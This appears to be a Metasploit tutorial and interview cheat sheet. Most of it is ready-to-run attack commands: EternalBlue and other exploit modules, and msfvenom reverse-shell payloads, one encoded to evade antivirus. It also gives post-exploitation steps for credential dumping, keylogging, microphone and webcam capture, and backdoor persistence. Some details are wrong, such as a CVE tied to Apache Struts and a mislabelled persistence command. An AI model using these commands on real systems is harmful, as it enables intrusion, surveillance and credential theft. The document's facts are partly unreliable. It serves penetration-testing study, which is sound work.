METASPLOIT - Complete Exploitation Framework Guide

Penetration Testing Framework: Discover, exploit, and post-exploit vulnerabilities

What is Metasploit?
Installation
Core Concepts
Basic Workflow
Common Exploits
Meterpreter Commands
Post-Exploitation
Interview Questions

What is Metasploit?

Metasploit is the most powerful penetration testing framework. It allows you to:

Scan networks for vulnerabilities
Exploit vulnerabilities automatically
Generate custom payloads
Establish reverse shells
Escalate privileges
Extract credentials
Maintain persistence
Post-exploitation activities

Versions:

Metasploit Framework (Free)
Metasploit Pro (Paid, more features)

Installation

Kali Linux (Pre-installed)

# Start Metasploit service
sudo systemctl start postgresql
sudo systemctl start metasploit

# Or manually
sudo service postgresql start
sudo msfconsole

Ubuntu/Debian

# Install dependencies
sudo apt-get install postgresql libpq-dev

# Install Metasploit
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/base/install.sh | bash

# Or from GitHub
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bundle install
./msfconsole

macOS

brew install metasploit-framework

Start Metasploit

# Start with database
sudo msfconsole

# Start without database
msfconsole -q

Core Concepts

Modules

Exploit: Attack code targeting specific vulnerability
Payload: Code executed after successful exploitation
Encoder: Obfuscates payload to evade detection
Evasion: Techniques to bypass security controls
Auxiliary: Scanning, enumeration, fuzzing
Post: Post-exploitation modules

Payloads

Types:
- Staged: Download stage 2 (small initial)
- Non-staged: Everything in one payload (larger)

Common payloads:
- windows/meterpreter/reverse_tcp (Windows shell)
- linux/x86/meterpreter/reverse_tcp (Linux shell)
- php/meterpreter/reverse_tcp (PHP shell)
- android/meterpreter/reverse_http (Android shell)
- cmd/unix/reverse_sh (Linux shell)

LHOST & LPORT

LHOST: Your attacker machine IP
LPORT: Port where reverse shell connects back to you

Example:
LHOST: 192.168.1.50 (Your IP)
LPORT: 4444 (Your listening port)
Victim connects back: 192.168.1.50:4444

Basic Workflow

Step 1: Start Metasploit

sudo msfconsole

Step 2: Search for Exploit

msf> search type:exploit platform:windows eternalblue
msf> search type:exploit apache

# Shows results:
# Name: exploit/windows/smb/ms17_010_eternalblue
# Rank: Great
# Path: /path/to/exploit

Step 3: Select Exploit

msf> use exploit/windows/smb/ms17_010_eternalblue

Step 4: Show Options

msf exploit(ms17_010_eternalblue)> show options

# Output:
# Name          Current Setting  Required  Description
# RHOSTS                          yes       Target host(s)
# PAYLOAD       windows/meterpreter/reverse_tcp
# LHOST         192.168.1.50      yes       Attacker IP
# LPORT         4444              yes       Listener port

Step 5: Set Options

msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> set PAYLOAD windows/meterpreter/reverse_tcp

Step 6: Show Advanced Options

msf> show advanced

# Shows timeout, threading, encoding options

Step 7: Exploit!

msf> exploit

# Or run in background:
msf> exploit -j

# Check jobs:
msf> jobs -l

# Interact with session:
msf> sessions -i 1

Common Exploits

EternalBlue (Windows SMB RCE)

# Most famous exploit
# Affects Windows 7, 8, 8.1, 10, Server 2008, 2012, 2016

msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> exploit

# Creates reverse meterpreter shell
# Access Windows target completely

Apache Struts CVE-2017-5645

# Web server vulnerability
# Remote code execution

msf> use exploit/multi/http/struts2_rce_cve_2017_5645
msf> set RHOSTS 192.168.1.100
msf> set LHOST 192.168.1.50
msf> exploit

vsftpd Backdoor

# FTP server vulnerability

msf> use exploit/unix/ftp/vsftpd_234_backdoor
msf> set RHOSTS 192.168.1.100
msf> exploit

# Shell access to Linux

Tomcat Manager Upload

# Tomcat weak credentials

msf> use exploit/multi/http/tomcat_mgr_upload
msf> set RHOSTS 192.168.1.100
msf> set HttpUsername admin
msf> set HttpPassword admin
msf> exploit

Payload Generation (msfvenom)

Basic Syntax

msfvenom -p [PAYLOAD] LHOST=[IP] LPORT=[PORT] -f [FORMAT] -o [OUTPUT]

Windows Payloads

# Reverse shell (TCP)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# Bind shell (listen on target)
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o shell.exe

# Staged payload (smaller size)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# With encoding (evade antivirus)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f exe -o shell.exe

# As batch file
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f batch -o shell.bat

Linux Payloads

# ELF executable
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell

# Shell script
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.1.50 LPORT=4444 -f sh -o shell.sh

# Python payload
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f python -o shell.py

PHP Payloads

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.php

# Embed in existing PHP
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f php -o shell.txt

Android Payloads

# APK reverse shell
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk

Meterpreter Commands

pwd                    # Current directory
cd /path/to/dir        # Change directory
ls -la                 # List files
cat /etc/passwd        # Read file contents
whoami                 # Current user
uname -a               # System information
hostname               # Computer name
ipconfig (or ifconfig) # IP configuration

File Operations

upload /path/local/file /path/remote/location  # Upload file
download /path/remote/file /path/local/loc     # Download file
rm /path/file                                    # Delete file
mkdir /path/newdir                              # Create directory

Process Management

ps              # List processes
kill [PID]      # Kill process
getpid          # Current process ID
migrate [PID]   # Move to another process (stealth)

Credential Dumping

hashdump        # Dump SAM hashes (Windows)
lsa_dump_sam    # Dump LSASS secrets
getsystem       # Escalate to SYSTEM

Keylogging

keyscan_start   # Start keystroke logging
keyscan_dump    # Show captured keystrokes
keyscan_stop    # Stop logging

Screenshot & Screen Capture

screenshot              # Take screenshot
record_mic [SECONDS]    # Record audio
webcam_snap             # Capture webcam photo
webcam_stream           # Stream webcam

Reverse Shell & Tunneling

shell              # Drop to system shell
execute -i -c cmd  # Execute command interactive
portfwd add -l [PORT] -p [REMOTE_PORT] -r [TARGET]  # Port forwarding

Persistence

persistence -X      # Run at startup
persistence -U      # Scheduled task
run scheduler -e    # Schedule execution
reg setval -k path -v name -d data  # Set registry (Windows)

Post-Exploitation

Windows Post-Exploitation

# Escalate to SYSTEM
getsystem

# Dump Windows hashes
hashdump

# Create backdoor user
run persistence -X

# Extract saved passwords
run windows_enum_ad
run winenum

# Start keylogger
keyscan_start
keyscan_dump

Linux Post-Exploitation

# Check sudo rights
sudo -l

# Find SUID binaries
find / -perm -4000 2>/dev/null

# Check cron jobs
cat /etc/crontab
find /var/spool/cron -type f

# Create backdoor account
useradd -m backdoor
echo 'backdoor:password' | chpasswd

# SSH key persistence
echo 'PUBLIC_KEY' >> ~/.ssh/authorized_keys

Information Gathering Post-Exploitation

# Network configuration
ifconfig / ipconfig

# Routing table
route

# Active connections
netstat -an

# ARP table
arp -a

# Open ports
ss -tulpn

# Running services
ps aux

Real-World Workflow

Complete Exploitation Scenario

1. SCANNING
   msf> use auxiliary/scanner/smb/smb_version
   msf> set RHOSTS 192.168.1.0/24
   msf> run
   # Find vulnerable Windows 7

2. SELECT EXPLOIT
   msf> use exploit/windows/smb/ms17_010_eternalblue

3. SET OPTIONS
   msf> set RHOSTS 192.168.1.100
   msf> set LHOST 192.168.1.50
   msf> set PAYLOAD windows/meterpreter/reverse_tcp

4. EXPLOIT
   msf> exploit

5. POST-EXPLOITATION
   meterpreter> hashdump
   meterpreter> getsystem
   meterpreter> keyscan_start
   meterpreter> persistence -X
   meterpreter> record_mic 10

Interview Questions & Answers

Q1: What’s the difference between staged and non-staged payloads?

Staged: Two-part payload
- Stage 1: Small loader (few KB)
- Stage 2: Full payload (downloads after Stage 1)
- Smaller initial size
- Better for limited bandwidth
- Example: windows/meterpreter/reverse_tcp
Non-Staged: Single payload file
- All in one executable
- Larger size
- Self-contained
- Example: windows/shell_reverse_tcp

Q2: How would you generate a Windows reverse shell?

# Generate EXE
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.50 \
  LPORT=4444 \
  -f exe \
  -o shell.exe

# On attacker machine (listener)
msfconsole
msf> use exploit/multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 192.168.1.50
msf> set LPORT 4444
msf> exploit

# On target
# Execute shell.exe
# Attacker gets reverse shell

Q3: What’s privilege escalation in Metasploit?

Goal: Move from limited user to SYSTEM/root

Methods:
1. Exploit vulnerability (EternalBlue escalates automatically)
2. getsystem command (finds local privilege escalation)
3. Token impersonation (steal admin token)
4. Kernel exploit (exploit OS kernel)

Windows:
- getsystem
- steal_token
- bypassuac

Linux:
- Kernel exploit
- SUID binary
- Weak sudo permissions

Q4: How would you maintain persistence after exploitation?

Methods:
1. Meterpreter persistence module
   run persistence -X (Windows startup)

2. Create backdoor user
   useradd -m backdoor
   echo 'backdoor:pass' | chpasswd

3. SSH key placement
   echo 'PUBLIC_KEY' >> ~/.ssh/authorized_keys

4. Cron job (Linux)
   * * * * * /path/to/shell.sh

5. Registry (Windows)
   HKCU\Software\Microsoft\Windows\Run

6. Scheduled task (Windows)
   schtasks /create /tn "task" /tr "cmd.exe"

Q5: What’s the significance of LHOST and LPORT?

LHOST: Listener host (your attack machine IP)
LPORT: Listener port (where victim connects back)

Scenario:
1. Generate payload with LHOST=192.168.1.50, LPORT=4444
2. Send to victim
3. Victim executes payload
4. Victim initiates connection to 192.168.1.50:4444
5. You receive reverse shell on your machine

Why reverse? 
- Victim is usually behind firewall
- Victim can connect OUT (to internet)
- You can't connect IN to victim
- Solution: Reverse shell (victim connects to you)

Good luck with testing! 🎯

Table of Contents#

What is Metasploit?#

Installation#

Kali Linux (Pre-installed)#

Ubuntu/Debian#

macOS#

Start Metasploit#

Core Concepts#

Modules#

Payloads#

LHOST & LPORT#

Basic Workflow#

Step 1: Start Metasploit#

Step 2: Search for Exploit#

Step 3: Select Exploit#

Step 4: Show Options#

Step 5: Set Options#

Step 6: Show Advanced Options#

Step 7: Exploit!#

Common Exploits#

EternalBlue (Windows SMB RCE)#

Apache Struts CVE-2017-5645#

vsftpd Backdoor#

Tomcat Manager Upload#

Payload Generation (msfvenom)#

Basic Syntax#

Windows Payloads#

Linux Payloads#

PHP Payloads#

Android Payloads#

Meterpreter Commands#

Navigation & System Info#

File Operations#

Process Management#

Credential Dumping#

Keylogging#

Screenshot & Screen Capture#

Reverse Shell & Tunneling#

Persistence#

Post-Exploitation#

Windows Post-Exploitation#

Linux Post-Exploitation#

Information Gathering Post-Exploitation#

Real-World Workflow#

Complete Exploitation Scenario#

Interview Questions & Answers#

Q1: What’s the difference between staged and non-staged payloads?#

Q2: How would you generate a Windows reverse shell?#

Q3: What’s privilege escalation in Metasploit?#

Q4: How would you maintain persistence after exploitation?#

Q5: What’s the significance of LHOST and LPORT?#

Table of Contents

What is Metasploit?

Installation

Kali Linux (Pre-installed)

Ubuntu/Debian

macOS

Start Metasploit

Core Concepts

Modules

Payloads

LHOST & LPORT

Basic Workflow

Step 1: Start Metasploit

Step 2: Search for Exploit

Step 3: Select Exploit

Step 4: Show Options

Step 5: Set Options

Step 6: Show Advanced Options

Step 7: Exploit!

Common Exploits

EternalBlue (Windows SMB RCE)

Apache Struts CVE-2017-5645

vsftpd Backdoor

Tomcat Manager Upload

Payload Generation (msfvenom)

Basic Syntax

Windows Payloads

Linux Payloads

PHP Payloads

Android Payloads

Meterpreter Commands

Navigation & System Info

File Operations

Process Management

Credential Dumping

Keylogging

Screenshot & Screen Capture

Reverse Shell & Tunneling

Persistence

Post-Exploitation

Windows Post-Exploitation

Linux Post-Exploitation

Information Gathering Post-Exploitation

Real-World Workflow

Complete Exploitation Scenario

Interview Questions & Answers

Q1: What’s the difference between staged and non-staged payloads?

Q2: How would you generate a Windows reverse shell?

Q3: What’s privilege escalation in Metasploit?

Q4: How would you maintain persistence after exploitation?

Q5: What’s the significance of LHOST and LPORT?